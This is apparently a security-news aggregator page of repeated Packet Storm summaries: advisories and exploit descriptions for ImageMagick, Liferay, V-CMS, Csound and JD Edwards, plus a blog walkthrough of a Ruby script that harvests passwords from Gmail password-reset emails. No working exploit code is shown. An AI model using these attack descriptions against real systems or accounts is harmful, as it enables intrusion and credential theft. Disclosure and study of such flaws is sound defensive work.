«
Expand/Collapse
1754 items tagged "file"
Related tags:
server version [+],
mandriva linux [+],
zero [+],
target system [+],
imagemagick [+],
image [+],
exchangeable image file format [+],
arbitrary path [+],
upload [+],
security advisory [+],
linux security [+],
cyberoam [+],
stack buffer [+],
red [+],
read [+],
local [+],
jd edwards [+],
hat [+],
download [+],
cms [+],
active x control [+],
x file [+],
system integrity checker [+],
shell [+],
samhain [+],
proof of concept [+],
networked hosts [+],
manager [+],
file manager [+],
client server application [+],
x window system [+],
x window [+],
saman [+],
portal [+],
pblang [+],
max [+],
gallery 1 [+],
gallery [+],
central console [+],
zero day [+],
ydframework [+],
xvs [+],
xcomp [+],
x application [+],
welcome component [+],
webgrind [+],
webapps [+],
vulnerabilities [+],
vbadvanced [+],
utm [+],
uploadify [+],
tversity [+],
tiny server [+],
tiny [+],
specto [+],
soco [+],
snort [+],
shell creation [+],
service vulnerability [+],
rule [+],
rips [+],
report [+],
remote [+],
realty [+],
radhikagb [+],
quest [+],
printfile [+],
pluxml [+],
phpmyadmin [+],
phpcollab [+],
php [+],
photo [+],
pandora [+],
packet [+],
overwrite [+],
overflow [+],
oracle [+],
open [+],
onefilecms [+],
onapsis [+],
novell [+],
nova cms [+],
multiple [+],
mount nfs [+],
message packet [+],
mandriva [+],
manager version [+],
malicious user [+],
machform [+],
login program [+],
linux package [+],
linux [+],
kernel network [+],
kernel [+],
jpg jpeg [+],
journal [+],
jdenet [+],
invalid pointer [+],
intrust [+],
inline image [+],
import command [+],
identification [+],
gocart [+],
glpi [+],
g remote [+],
fundhelp [+],
fms [+],
file manipulation [+],
existence [+],
dreambox [+],
denial of service [+],
default [+],
csound [+],
cryptographp [+],
cross site scripting [+],
creation vulnerability [+],
com [+],
cmps [+],
cifs [+],
chdir [+],
bulkenquery [+],
buffer overflow vulnerability [+],
buffer overflow vulnerabilities [+],
buffer overflow [+],
boss [+],
bitweaver [+],
beta [+],
bch [+],
base [+],
autographbook [+],
attacker [+],
arbitrary [+],
application server [+],
anecms [+],
joomla [+],
wicket [+],
webdav [+],
version 6 [+],
vbulletin [+],
unc path [+],
system [+],
sadnews [+],
ram disk [+],
plugins [+],
openpgp key [+],
openemr [+],
nbsp [+],
multiple file [+],
liferay [+],
font [+],
file format [+],
external entity [+],
encrypted file system [+],
document [+],
composite [+],
command execution [+],
bugtraq [+],
based buffer overflow [+],
arbitrary command [+],
arbitrary code execution [+],
application [+],
apache [+],
x.org [+],
x quicktime [+],
winexe [+],
windows platforms [+],
webcalendar [+],
vpns [+],
vespa [+],
usu [+],
uniformed services university [+],
transfer protocol ftp [+],
tomatocart [+],
target address [+],
symfony [+],
symantec [+],
sos [+],
site [+],
sharers [+],
server message block [+],
security [+],
samba [+],
ruby [+],
read permission [+],
protocol [+],
privilege [+],
plain text passwords [+],
pirate bay [+],
phppaleo [+],
pcanywhere [+],
nbsp nbsp nbsp nbsp nbsp [+],
multiple buffer overflow [+],
mtab [+],
movie [+],
modx [+],
method [+],
megaupload [+],
mdvsa [+],
mac os [+],
m3u file [+],
local privilege escalation [+],
line [+],
library [+],
language [+],
jce [+],
invision power board [+],
integrity checker [+],
integrity [+],
integer overflow vulnerability [+],
information disclosure vulnerability [+],
information [+],
inbox folder [+],
imap server name [+],
health sciences [+],
health [+],
handling [+],
hacking [+],
guestbook [+],
goofile [+],
filetype [+],
file upload [+],
file transfer protocol [+],
file sharing [+],
file sharers [+],
file security [+],
file php [+],
file permissions [+],
exif [+],
dsa [+],
downloader [+],
don [+],
domain [+],
directory traversal [+],
descriptors [+],
darknet [+],
d test [+],
configuration syntax [+],
citrusdb [+],
checker [+],
buffer [+],
browser address bar [+],
boot ini [+],
bip [+],
apple mac os x [+],
apple mac os [+],
apple filing [+],
alpha 2 [+],
alpha [+],
ajaxmint [+],
afp [+],
Tools [+],
Pentesting [+],
server [+],
day [+],
inclusion [+],
vulnerability [+],
disclosure [+],
red hat security [+],
zyxel zywall,
zywall,
zrl,
zoneminder,
zipcentral,
zip file,
zip,
ziggurat,
zeuscms,
zeenetworking,
zeematri,
zdi,
yplay,
yappa,
yapig,
xwine,
xss,
xpm,
xp sp3,
xorg,
xoops,
xmovie,
xml,
xgallery,
xee,
x86 linux,
x wcms,
x versions,
x freetype,
x coreaudio,
wysiwyg,
wrf file,
wrf,
wpeasystats,
wpa tkip,
wpa psk,
world writable,
wordtrainer,
wordpress,
wordlists,
word builder,
word,
wizard version,
wizard v1,
wizard head,
wizard,
wireshark,
winplot,
winmount,
windows management instrumentation,
windows bitmap,
windows,
winamp,
win32,
win,
wikkawiki,
widelands,
wi fi,
whmcs,
whmcompletesolution,
whitepaper,
wep,
websphere,
website,
webserver,
webrcsdiff,
webkit,
webinterface,
webex player,
webedition,
webc,
webad,
web server version,
web root,
web monitor,
web manager,
web edition,
web,
wcms,
wav file,
wamp,
vwr,
vuplayer,
vulnerability scanner,
vulnerability research,
vtigercrm,
vtiger crm,
vtiger,
vmware server,
vmware,
vivvo cms,
vivvo,
visiwave,
virusscan,
virus,
virtual folders,
virtual dj,
virtual,
videodb,
video encoding,
video,
version,
vbseo,
vbsedit,
vbeso,
vault,
varicad,
vanilla,
vana cms,
vana,
value,
uyumweb,
usn,
usg,
usernames passwords,
user,
usa,
uri redirection,
urchin 5,
urchin,
uploaderv,
uploader,
update,
unix systems,
universal,
ungallery,
unauthenticated,
umount,
uigaproxy,
ubuntu,
typo,
txt,
tvip,
tuniac,
tugzip,
tugux,
tsp,
trust relationships,
tribisur,
triangles,
traversal,
transit inc,
transit,
transfer,
tramot,
tinywebgallery,
tinybrowser,
timeclock software,
thompson mathew monroe tags,
thinvnc,
thingie,
thecartpress,
tgz,
temporary file,
temporary,
techphoebe,
technology,
tastydir,
targets,
target application,
target,
tar gz,
tampering,
tajan,
tailoredweb,
tagger,
system versions,
system v1,
system input,
system compromise,
syctel,
swfupload,
swf,
sweetrice,
suspected,
support incident,
sulata,
suffers,
subtitle,
studio v1,
studio 9,
studio,
string function,
storm,
store,
storageworks,
steganography,
stardevelop,
stagetracker,
stack overflow,
stack,
stable,
sql ledger,
sql injection,
sql,
sports,
spoof,
sphider,
spaziottantotto,
spam,
sp3,
sourceforge,
sourcebans,
source code,
source,
software installation,
software inc,
socket,
socialware,
snif,
snackamp,
smi file,
smi,
slk,
slides,
sketchup,
size argument,
size,
sites,
simplyplay,
simplepms,
simplephpweb,
simple,
shutters,
shred file,
shred,
shockwave user,
shockwave player,
shockwave,
shitz,
shellcode,
sharepoint,
share,
shackleton,
setup script,
setup php,
setlist,
server side applications,
server directory,
serenity audio,
serenity,
security vulnerabilities,
security notice,
security mechanisms,
security issue,
security gateways,
security flaws,
secure desktop,
search version,
search engines,
search,
seagull,
sea creature,
scripts,
script version,
scanner module,
scanner,
scam,
sauruscms ce,
sauruscms,
sapid,
sandbox,
sahana,
safer use,
sabadkharid,
ruubik,
rtx,
rtrandomimage,
rrd,
rpm,
rootkits,
root compromise,
root,
rollin remote,
rollin,
rokquickcart,
rogiobiz,
ripper,
riaa,
rhinos,
rfis,
rfi,
retrieval,
reset request,
reporter. authentication,
reporter engine,
reporter agent,
reporter,
replaces,
reos,
rendering,
remote shell,
remote security,
remote file include vulnerability,
remote buffer overflow vulnerability,
remote buffer overflow,
record,
realwin,
realplayer user,
realplayer,
real,
reading vulnerability,
reading,
react,
rcs,
rap,
random user,
raja natarajan,
rainbowcrack,
radasm,
quot,
quicktime player,
quicksilver,
quickshare,
quickplayer,
quicklook,
quick,
qqplayer,
python script,
pyrit,
puntal,
publisher,
proxy,
proof,
proletsoft,
professional,
processor,
processing,
process,
pro versions,
pro v2,
privileged accounts,
privilege escalation vulnerability,
private data,
privacy risks,
privacy event,
prevx,
prestashop,
presentation,
pre,
pr10,
powupload,
powerpoint,
postscript,
poste,
position error,
popscript,
polypager,
polls,
police municipale,
pointer,
poetry authors,
podcast,
poc,
png file,
png,
plus,
plugin version,
plugin,
pluck,
pls,
plogger,
pligg,
playstation,
playsms,
playlistmaker,
player 1,
player,
pjl,
pixelgems,
pithcms,
pith,
pipeline,
pigalle,
pidgin,
pict images,
pict,
pico,
phreebooks,
phpmyexplorer,
phpmychat,
phpmur,
phpids,
phpgroupware,
phpgraphy,
phpgedview,
phpformgenerator,
phpegasus,
phpcityportal,
phpchat,
phpbugtracker,
phpboost,
phpbb,
php nuke,
php fusion,
php code,
photograph images,
photograph,
phool,
phoenixcms,
phocadownload,
phire,
pgn,
permission,
per day,
penetration,
pdf reader,
pdf file format,
pdf,
pcs,
paul,
path parameter,
path analysis,
patching,
password resets,
password,
parameter,
paper pdf,
paper documents,
paper,
panel,
pam motd,
paint shop pro image,
paf,
packet storm,
packet count,
package,
p2p,
overflow vulnerability,
output,
outlook,
outfile,
otsav,
ossim,
osdate,
oscss,
oscommerce,
ord,
orangehrm,
operands,
openx,
opensite,
openpresse,
openoffice,
openmyzip,
opencominterne,
opencatalogue,
opencart,
opencadastre,
openads,
open forum,
oiblogs,
ofl,
office,
odlican,
obsuggest,
null pointer,
null bytes,
null byte,
nuke,
nucleus,
nubuilder,
nokia dct3,
nodesforum,
nice,
nfspy,
nfs export,
nfs,
news system,
news,
new,
network,
netpbm,
naturpic,
nator,
natarajan,
name,
mywebserver,
mysqldumper,
myseatxt,
myownspace,
mynews,
mymp3 player,
mymp,
myimages,
mybloggie,
multipath,
multi,
mppl,
mplayer,
mpf,
mpdf,
mp3 tagger,
mp3 cutter,
mp3 cd converter,
mp3,
movie file,
mou,
moreamp,
moons,
monkey,
modules package,
modules,
module versions,
module,
mnu,
mirroring,
mini stream ripper,
mini stream,
millennium mp3 studio,
millennium,
millenium mp3,
millenium,
mikeyzip,
mike tsao,
migration agent,
migration,
midi plugin,
midi file format,
midi file,
midi,
microsoft powerpoint,
microsoft outlook,
microsoft office powerpoint,
microsoft,
microp,
michael sutton,
miacms,
metasploit,
metalink,
messages,
memory corruption,
memory copy,
memory,
medussa,
medusa,
medina tags,
mediacoder,
media manager,
media,
md5 hash,
mcafee,
maticmarket,
mathew,
master c,
marketsaz,
mario vuksan,
marcia hofmann,
marc schoenefeld,
map,
mantisbt,
manager v1,
manager interface,
manager component,
manager arbitrary,
management version,
management,
malicious website,
malicious users,
maintenance program,
main courante,
mail form,
mail,
maf,
mac os x,
mac,
m3u,
lzw,
lwp,
luis alvarez,
lovecms,
loop,
lokomedia,
logwatch,
logrotate,
log,
localfile,
local resources,
local file system,
local buffer overflow,
load,
livesig,
livehelp,
littlephpgallery,
linux systems,
linux operating system,
linux machines,
linux machine,
links,
limny,
limewire,
lightneasy,
libsndfile,
libreoffice,
libpng,
liblime,
lib,
lha,
lfi,
length,
legend,
latex,
laser cutter,
laser,
la poste,
ksp,
koha,
kofax,
kleophatra,
kimsq,
kget,
keyview,
kde,
kcms,
jradio,
jotloader,
jorge luis alvarez,
joomtouch,
jon larimer,
john ripper,
john,
jedit,
jeajaxeventcalendar,
jcow,
jcomments,
jcms,
jaxcms,
jaws,
javascript,
java runtime environment,
jan lieskovsky,
jakcms,
izumi,
iware,
ivs,
isoft,
ip data,
ip addresses,
intrusion detection system,
interphoto,
internet explorer browser,
internet explorer,
internet,
intermediate files,
integer,
instrumentation service,
installation,
insecure,
input file,
input,
initial path,
information disclosure,
index file,
incremental mode,
inclusion issues,
include,
inc,
impress,
imanager,
image manager,
image file,
ignition,
idevspot,
idevcart,
icp,
ico file,
icc,
icarus,
ibrowser,
ibm websphere,
ibm,
i com,
hycus,
httpdx,
htb,
hp storageworks,
hp laserjet printers,
hotnews,
hosting,
horde,
homepina,
home web,
hofmann,
hind cms,
hijacking,
hidden messages,
hidden,
hibernation,
hertzcms,
helpcenter,
helloword,
heap memory,
heap,
head,
hcs,
hash,
harvard,
hanso,
hacks,
hacker,
guide,
grboard,
gray scale image,
google urchin,
google sketchup,
google,
gnu ed,
gnu,
glyptodon,
glsa,
gloves in a bottle,
gloves,
gimp,
gif,
getsimple,
getopt,
gentoo linux security,
generator,
generalproducts,
gcalendar,
gba,
gawker,
gallo,
galilery,
gaestebuch,
fuzzing,
fuzzdiff,
fusion,
function pointers,
ftp,
fstealer,
froxlor,
from,
freephpwebsitesoftware,
freeamp,
free image,
free,
foxplayer,
foxmediatools,
foxit,
forum version,
forum server,
forum group,
forum,
format,
forgery,
forensics,
forensic security,
forensic,
fopen,
folder creation,
flvplayer,
flic,
flexicontent,
flex,
flc delta,
flashpix,
flash gallery,
flash,
firmware update,
firefox,
firebrand technologies,
firebrand,
filedownload,
filebox,
file vault,
file uploads,
file uploader,
file transfer,
file signature,
file sharing system,
file share,
file server,
file search,
file renaming,
file processing,
file management system,
file management,
file folder,
file deletion,
file cutter,
file cabinet,
file browser,
fieldnotes,
ffdshow,
feindura,
features of internet explorer,
fcms,
fckeditor,
fbi,
faulty logic,
fat,
factux,
facil,
ezreservation,
ezapparel,
eyeos,
exponent,
explzsh,
exploring,
explorer v1,
explorer,
exploits,
exploiter,
exploit,
expert,
execution,
exe,
exact cause,
evolution,
evince,
ettercap,
etter,
etsb,
escalation,
erf,
enumeration,
enterprise version,
enterprise,
enigma,
encoded,
encapscms,
employee timeclock,
emf,
elxis,
element,
egroupware,
efront,
effective,
edu,
editor,
edition,
editeur,
ecommerce,
easysiteedit,
easyphpalbum,
easy icon maker,
easy file sharing web server,
easy,
eaflashupload,
e. street,
e book,
dynpg,
dxf,
dwb,
dvipng,
dvi,
drupal,
drivecrypt,
dotnetnuke,
dotclear,
dorsacms,
dompdf,
dolphin,
dolibarr,
dokuwiki,
dokeos,
dj legend,
discovery,
disclosure issues,
directory traversal vulnerability,
directory,
digital senders,
digital,
digistore,
dictionary text,
dictionary files,
dictionary file,
dictionary attack,
dictionary,
dialog box,
detailed description,
destination buffer,
desktoponnet,
desktop user,
designed,
design,
descriptive guide,
dereference,
dell openmanage,
deletion,
default installation,
deepburner,
decode,
debian linux,
deaf ears,
dbr,
dave ferguson,
datac,
database,
data,
dashboards,
darkjumper,
dan rosenberg,
dan crowley,
d.r. software,
cytel,
cybele software,
cvs,
cutter,
cutenews,
cups,
cultbooking,
cubecart,
cryptography,
cross,
crm,
crish,
credentials,
creation,
crash analysis,
crash,
cracking,
cpio,
cpanel,
corporate desktop,
core,
coolplayer,
cookie values,
cookie value,
converting,
converter,
content length,
content disposition,
content,
contact,
configuration file,
configuration,
config,
concept,
component version,
compactcms,
college version,
college,
collectd,
collabtive,
codes,
codeigniter,
code execution,
code,
cnc,
cmsmini,
cmsmadesimple,
clusters,
client messages,
client,
clearsite,
classic,
cktricky,
ckfinder,
cituscms,
cisco webex,
cisco signed,
cisco secure,
ciao a tutti,
chmod,
chillycms,
chatting,
chaton,
chartac,
chaos,
channel keys,
change,
chamilo,
cff,
cdr,
cdevision,
ccd files,
ccd file,
ccd,
cauposhop,
catalogue,
castripper,
cart,
caratteri,
captcha,
cap,
cabinet,
cabextract,
cab file,
cab,
bytolinet,
buzzywall,
bup extension,
bulletin,
builder,
buffer overflows,
buffer overflow exploit,
bt4,
bssid,
brute force method,
browser,
brian karney,
brazip,
bottle,
boston,
booksolved,
book store,
book,
boastmachine,
bmc,
blender,
blend,
black hat,
binfile,
bigace,
bibtex,
bib,
betsy,
beta local,
beta 3,
beltane,
bbzl,
batch file,
batch,
batavi,
barizweb,
baofeng,
balitbang,
backup,
b14,
b hind,
axd,
awiki,
awcm,
avi file,
avi,
avatar,
autonomy,
automated system,
auto,
authentication,
audiotran,
audio player,
audio file library,
audio,
attribute,
attack,
attachments,
attachmax,
atomixmp,
atas,
asx to mp3 converter,
asx,
artmedic,
art,
arithmetic,
aria,
arf,
arduino,
ardeacore,
archive records,
arbitrary name,
arbitrary files,
arbitrary code,
arabic names,
arabic,
apple xss,
apple safari,
apple quicktime,
apple itunes,
apple,
api,
ape file,
aol,
anonip,
annonces,
angora,
android,
analyzer,
amp,
amount,
alsbtain,
alplayer,
alpha remote,
alpha cms,
allwebmenus,
allulu,
allpc,
allocation,
alex,
album gallery,
akamai download,
ajax,
airodump,
aircrack,
aimp,
agencia,
agasti,
advanced,
adobe shockwave player,
adobe reader,
adobe acrobat reader,
adobe,
administrator privileges,
administrative user,
adersoft,
address,
adam greene,
activex control,
active x,
acrobat reader user,
acp,
access point,
access interface,
access control mechanisms,
access,
accellion,
abus,
Wireless,
Supporto,
Support,
Software,
Programming,
Newbie,
Forums,
Final,
BackTrack,
Area,
Angolo,
3d model
Skip to page:
1
2
3
...
8
-
-
7:36
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-078 - Multiple vulnerabilities has been found and corrected in imagemagick. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop. Various other issues have also been addressed.
-
7:36
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-078 - Multiple vulnerabilities has been found and corrected in imagemagick. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop. Various other issues have also been addressed.
-
7:36
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-078 - Multiple vulnerabilities has been found and corrected in imagemagick. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop. Various other issues have also been addressed.
-
12:29
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-077 - Untrusted search path vulnerability in configure.c in ImageMagick before 6.6.5-5, when MAGICKCORE_INSTALLED_SUPPORT is defined, allows local users to gain privileges via a Trojan horse configuration file in the current working directory. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop. Various other issues have also been addressed.
-
-
13:04
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0544-01 - ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
-
13:04
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0544-01 - ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
-
13:03
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0545-01 - ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
-
13:03
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0545-01 - ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
-
8:43
»
Packet Storm Security Tools
Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
-
-
17:17
»
Packet Storm Security Exploits
By creating a specially crafted webdav request that contains an external entity it is possible to read files from Liferay Portal version 6.0.5 ce. Proof of concept code included.
-
17:17
»
Packet Storm Security Recent Files
By creating a specially crafted webdav request that contains an external entity it is possible to read files from Liferay Portal version 6.0.5 ce. Proof of concept code included.
-
-
17:08
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found on V-CMS's inline image upload feature. The problem is due to the inline_image_upload.php file not checking the file type before saving it on the web server. This allows any malicious user to upload a script (such as PHP) without authentication, and then execute it with a GET request. The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as one of those extension names, which may still be leveraged in an attack.
-
17:08
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability found on V-CMS's inline image upload feature. The problem is due to the inline_image_upload.php file not checking the file type before saving it on the web server. This allows any malicious user to upload a script (such as PHP) without authentication, and then execute it with a GET request. The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as one of those extension names, which may still be leveraged in an attack.
-
17:08
»
Packet Storm Security Misc. Files
This Metasploit module exploits a vulnerability found on V-CMS's inline image upload feature. The problem is due to the inline_image_upload.php file not checking the file type before saving it on the web server. This allows any malicious user to upload a script (such as PHP) without authentication, and then execute it with a GET request. The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as one of those extension names, which may still be leveraged in an attack.
-
-
13:22
»
Packet Storm Security Exploits
The Uniformed Services University of the Health Sciences (USU) suffers from a file inclusion vulnerability.
-
-
15:22
»
Packet Storm Security Exploits
CitrusDB version 2.4.1 suffers from local file inclusion and remote SQL injection vulnerabilities.
-
-
18:02
»
Packet Storm Security Exploits
This Metasploit module exploits a buffer overflow in Csound before 5.16.6. The overflow occurs when trying to import a malicious hetro file from tabular format. In order to achieve exploitation the user should import the malicious file through csound with a command like "csound -U het_import msf.csd file.het". This exploit doesn't work if the "het_import" command is used directly to convert the file.
-
18:02
»
Packet Storm Security Recent Files
This Metasploit module exploits a buffer overflow in Csound before 5.16.6. The overflow occurs when trying to import a malicious hetro file from tabular format. In order to achieve exploitation the user should import the malicious file through csound with a command like "csound -U het_import msf.csd file.het". This exploit doesn't work if the "het_import" command is used directly to convert the file.
-
18:02
»
Packet Storm Security Misc. Files
This Metasploit module exploits a buffer overflow in Csound before 5.16.6. The overflow occurs when trying to import a malicious hetro file from tabular format. In order to achieve exploitation the user should import the malicious file through csound with a command like "csound -U het_import msf.csd file.het". This exploit doesn't work if the "het_import" command is used directly to convert the file.
-
19:32
»
Packet Storm Security Misc. Files
Uploadify version 3.0.0 suffers from a file existence disclosure vulnerability.
-
-
7:49
»
Packet Storm Security Misc. Files
phpPaleo version 4.8b156 suffers from a local file inclusion vulnerability. A vulnerability exists in index.php for language handling that allows for local file inclusion using a null-byte attack on the 'lang' GET parameter.
-
-
22:03
»
Packet Storm Security Exploits
Quest InTrust version 10.4.x suffers from ArDoc.dll active-x control remote file creation / overwrite vulnerabilities in the ReportTree and SimpleTree classes. Proof of concept code included.
-
22:03
»
Packet Storm Security Recent Files
Quest InTrust version 10.4.x suffers from ArDoc.dll active-x control remote file creation / overwrite vulnerabilities in the ReportTree and SimpleTree classes. Proof of concept code included.
-
10:41
»
Packet Storm Security Tools
Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
-
-
16:53
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-035 - Multiple out-of heap-based buffer read flaws and invalid pointer dereference flaws were found in the way file, utility for determining of file types processed header section for certain Composite Document Format files. A remote attacker could provide a specially-crafted CDF file, which once inspected by the file utility of the victim would lead to file executable crash. The updated packages for Mandriva Linux 2011 have been upgraded to the 5.11 version and the packages for Mandriva Linux 2010.2 has been patched to correct these issues.
-
16:53
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-035 - Multiple out-of heap-based buffer read flaws and invalid pointer dereference flaws were found in the way file, utility for determining of file types processed header section for certain Composite Document Format files. A remote attacker could provide a specially-crafted CDF file, which once inspected by the file utility of the victim would lead to file executable crash. The updated packages for Mandriva Linux 2011 have been upgraded to the 5.11 version and the packages for Mandriva Linux 2010.2 has been patched to correct these issues.
-
16:53
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-035 - Multiple out-of heap-based buffer read flaws and invalid pointer dereference flaws were found in the way file, utility for determining of file types processed header section for certain Composite Document Format files. A remote attacker could provide a specially-crafted CDF file, which once inspected by the file utility of the victim would lead to file executable crash. The updated packages for Mandriva Linux 2011 have been upgraded to the 5.11 version and the packages for Mandriva Linux 2010.2 has been patched to correct these issues.
-
-
8:29
»
Carnal0wnage
In July I published an article on
Abusing Password Resets. Some Ruby code was provided and it no longer works very well. Gmail has a limitation on POP3 message retrieval, long story short, you can only get around 250 emails. This is pretty annoying when you want to pull down thousands of password reset emails to analyze the plain-text passwords for entropy. So the solution is to use IMAP.
Here is that code:
Breakdown:
Lines 1-3 - Start the script in Ruby, require the necessary libs
Lines 6, 8 - Name the class, instantiate a placeholder for file (could have been done with an instance variable as well).
Lines 10-11 - Method invoked (def initialize) when the class is started, self.lfile is the location of the file we will store our emails in.
Line 13, 18, 21 - Begin, Rescue, End code (mainly so we graciously handle errors)
Line 14 - Instantiate a connection string to Gmail's IMAP server, name it "imap".
Line 16-17 - Provide creds and invoke the check_for_emails method
Lines 24, 33 - define the check_emails_method, take the imap object as input, and close "end" the method.
Lines 25-26 - Select the inbox as the folder to pilfer and then instantiate a msgs object which has the results of all messages that haven't been deleted.
'
Lines 27-32 - If "msgs" (Array) is empty, print a message saying so, otherwise print that we are grabbing emails and invoke the place_emails_into_files method with both the msgs and imap objects.
Lines 35, 44 - define the method (place_emails_into_file) and close it off.
Line 36 - Iterate thru the msgs array, creating a mid (message id) object.
Lines 37-38 - Fetch the message with the message id (mid) we have created and then chomp any extra space off the end.
Lines 39-41 - Open the emails.txt file in the inbox folder (you've hopefully created) and write the message body into it (appending, NOT overwriting).
Line 43 - Invoke the create_file_with_tokens method.
Lines 46, 56 - define the create_file_with_tokens method and then close it.
Lines 47-49 - Create a new file which will contain the string you are trying to extract (the password) and then open the 'inbox/emails.txt' file for reading. Finally, on line 49 start iterating thru each line of the read_file ('inbox/emails.txt').
Lines 50-51 - Match the string you are looking for, if the m object (result of the match) is of a MatchData type, then put that string (password) into the "tokens.txt" or new_file, file.
Lines 53-55 - Close both files and print that we are done.
This should be able to run in Ruby versions 1.8.7 and greater. Ensure that you put your username and password in place of the ones I've entered on line 16.
cktricky
-
-
22:23
»
Packet Storm Security Recent Files
Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
-
22:23
»
Packet Storm Security Tools
Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
-
22:23
»
Packet Storm Security Misc. Files
Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
-
20:17
»
Packet Storm Security Advisories
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the JDESAW Kernel is configured (it is by default), then it would be possible to read any file on the system.
-
20:17
»
Packet Storm Security Recent Files
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the JDESAW Kernel is configured (it is by default), then it would be possible to read any file on the system.
-
20:17
»
Packet Storm Security Misc. Files
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the JDESAW Kernel is configured (it is by default), then it would be possible to read any file on the system.
-
20:06
»
Packet Storm Security Advisories
Onapsis Security Advisory - If a "Message packet" is sent to the JDENet port (6015 by default) containing a specially crafted "File Packet", the sent file is saved in the server where the JDENet service is running, in the arbitrary location specified by the "File Packet".
-
20:06
»
Packet Storm Security Recent Files
